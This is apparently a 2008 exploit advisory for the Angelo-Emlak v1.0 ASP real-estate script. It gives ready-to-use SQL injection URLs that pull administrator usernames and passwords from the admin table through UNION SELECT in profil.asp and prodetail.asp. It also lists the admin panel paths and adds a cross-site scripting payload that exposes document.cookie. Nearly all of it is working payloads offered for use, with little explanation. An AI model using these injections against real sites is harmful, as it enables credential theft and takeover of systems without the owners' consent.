67 lines
No EOL
1.6 KiB
Text
67 lines
No EOL
1.6 KiB
Text
Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable
|
|
|
|
|
|
Discovered By : U238
|
|
|
|
msn :setuid.noexec0x1[+]hotmail[-].com
|
|
|
|
|
|
webPage :http://noexec.blogspot.com
|
|
|
|
|
|
|
|
Script : http://www.aspdepo.org/tr/incele.asp?id=587&Script=angelo-emlak-v1.0-(tr)
|
|
|
|
|
|
Script2 : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html
|
|
|
|
|
|
|
|
not : Siz0yyffyeniz biz kardesim inkar edenmı var ya :( - Allah .belanı versin ulan $iz0 .buda yılın sozu :D
|
|
|
|
|
|
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
|
|
|
|
Exploit:
|
|
|
|
|
|
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1
|
|
|
|
|
|
----------
|
|
|
|
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin
|
|
|
|
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin
|
|
|
|
---------
|
|
|
|
Admin Panel :
|
|
|
|
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/default.asp
|
|
|
|
X13 DB Editor Admin Panel :
|
|
|
|
http://localhost:2222/lab/angelo-emlak_v1.0/hpz/admin
|
|
|
|
|
|
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
|
|
|
|
|
|
This script is xss vulnerable ! ..
|
|
|
|
Exploit :
|
|
|
|
|
|
target/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS]
|
|
|
|
"><script>alert(document.cookie)</script>&olay=insert
|
|
|
|
|
|
----------------------------------------------------
|
|
|
|
My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - Caborz - Sersak - ZeberuS
|
|
|
|
U238 | Web - Designer Solutions Developer
|
|
|
|
# milw0rm.com [2008-04-26] |